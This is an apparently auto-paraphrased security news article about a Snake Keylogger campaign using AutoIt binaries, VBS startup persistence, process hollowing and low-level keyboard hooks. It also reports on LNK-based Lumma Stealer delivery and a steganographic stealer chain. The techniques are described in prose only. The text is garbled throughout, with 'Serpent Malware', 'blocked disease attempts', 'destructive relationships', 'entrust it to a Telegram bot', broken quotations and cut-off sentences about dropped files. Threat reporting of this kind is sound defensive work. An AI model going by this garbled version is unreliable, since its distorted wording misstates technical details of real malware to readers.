A new version of the Serpent Malware malware is being used to constantly targeted Windows customers located in China, Turkey, Indonesia, Taiwan, and Spain.
Over 280 million blocked disease attempts have been made international since the start of the year, according to Fortinet FortiGuard Labs, according to FortiGuard Labs.
” Usually delivered through phishing emails containing destructive relationships or connections, Snake Keylogger is designed to steal sensitive information from popular web sites like Chrome, Edge, and Firefox by logging keystrokes, capturing credentials, and monitoring the clipboard”, security researcher Kevin Su .
With the help of the Simple Mail Transfer Protocol ( SMTP ) and Telegram bots, it’s other features allow it to exfiltrate the stolen data to an attacker-controlled server, allowing the threat actors to gain access to stolen credentials and other sensitive data.
The most notable aspect of the most recent set of attacks is that it uses AutoIt scripting to deliver and execute the main payload. In other words, the executable containing the malware is an AutoIt-compiled binary, thereby allowing it to bypass traditional detection mechanisms.
The use of AutoIt makes dynamic behavior that mimics benign automation tools as well as complicate static analysis by encoding the payload into the compiled script, Su added.
Once launched, Snake Keylogger is designed to drop a copy of itself to a file named” ageless. exe “in the folder” % Local_AppData % supergroup. ” It also proceeds to drop another file called” ageless. Every time a system reboot occurs, the Visual Basic Script (VBS ) will automatically launch the malware in the Windows Startup folder.
Snake Keylogger can continue to access the compromised system and resume its malicious activities even after the associated process is terminated because of this persistence mechanism.
The attack chain culminates with the injection of the main payload into a legitimate .NET process such as” regsvcs. “using a method known as process hollowing, the malware can hide its location within a trusted process and avoid detection,”
Snake Keylogger is also known to use websites like checkip and record keystrokes. dyndns [. ] org to retrieve the victim’s IP address and geolocation.
” To capture keystrokes, it leverages the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL ( flag 13 ), a low-level keyboard hook that monitors keystrokes,” Su said”. This method enables the malware to log sensitive data, such as banking credentials.
The development comes as CloudSEK revealed a campaign that is utilizing compromised infrastructure in educational institutions to distribute malicious LNK files disguised as PDF documents in order to use malware in the end.
The activity, targeting industries like finance, healthcare, technology, and media, is a multi-stage attack sequence that results in the theft of passwords, browser data, and cryptocurrency wallets.
Security researcher Mayank Sahariya that the campaign’s main infection vector is the use of malicious LNK ( shortcut ) files that are designed to appear as legitimate PDF documents. The files are hosted on a WebDAV server, which unsuspecting visitors are redirected to after visiting websites, according to security researcher Mayank Sahariya.
For its part, the LNK file runs a PowerShell command to connect to a distant server and retrieve the next-stage malware, an obfuscated JavaScript code that contains another PowerShell that downloads Lumma Stealer from the same server and executes it.
In recent weeks, stealer malware has been discovered spreading through to encrypt a variety of sensitive data from compromised Windows systems and entrust it to a Telegram bot run by the attacker.
According to Cyfirma, the attack begins with an obfuscated JavaScript file that retrieves encoded strings from an open-source service to execute a PowerShell script.
A JPG image and a text file are then downloaded by this script using steganographic techniques, as well as an IP address and a URL shortener, both of which contain malicious MZ DOS executables. Once executed, these payloads deploy stealer malware.”